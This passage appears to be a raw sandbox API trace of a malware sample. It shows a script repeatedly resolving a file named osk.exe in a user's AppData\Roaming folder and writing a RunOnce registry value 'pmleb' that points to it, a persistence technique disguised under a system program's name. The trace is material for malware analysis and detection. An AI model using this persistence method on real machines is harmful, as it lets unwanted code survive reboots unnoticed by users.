rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.407] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.407] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.407] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0082.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.407] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0082.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.408] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0082.408] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.408] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.408] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.408] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.408] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.409] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.409] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.409] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.409] RegCloseKey (hKey=0x280) returned 0x0 [0082.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.409] SetTimer (hWnd=0x20280, nIDEvent=0x20ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ee [0082.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.420] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.420] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.420] KillTimer (hWnd=0x20280, uIDEvent=0x20ee) returned 1 [0082.421] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.421] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.421] IUnknown:Release (This=0x787518) returned 0x1 [0082.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.421] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.421] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.421] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.421] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0082.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.421] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0082.422] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.422] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0082.422] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.422] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.422] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.422] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.422] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.423] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.423] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.423] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.423] RegCloseKey (hKey=0x280) returned 0x0 [0082.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.423] SetTimer (hWnd=0x20280, nIDEvent=0x20ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ef [0082.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.436] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.436] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.436] KillTimer (hWnd=0x20280, uIDEvent=0x20ef) returned 1 [0082.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.436] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.436] IUnknown:Release (This=0x787518) returned 0x1 [0082.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.437] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.437] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0082.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.437] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0082.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.438] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0082.438] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.438] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.438] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.438] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.438] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.438] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.438] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.439] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.439] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.439] RegCloseKey (hKey=0x280) returned 0x0 [0082.439] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.439] SetTimer (hWnd=0x20280, nIDEvent=0x20f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f0 [0082.439] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.451] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.451] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.452] KillTimer (hWnd=0x20280, uIDEvent=0x20f0) returned 1 [0082.452] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.452] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 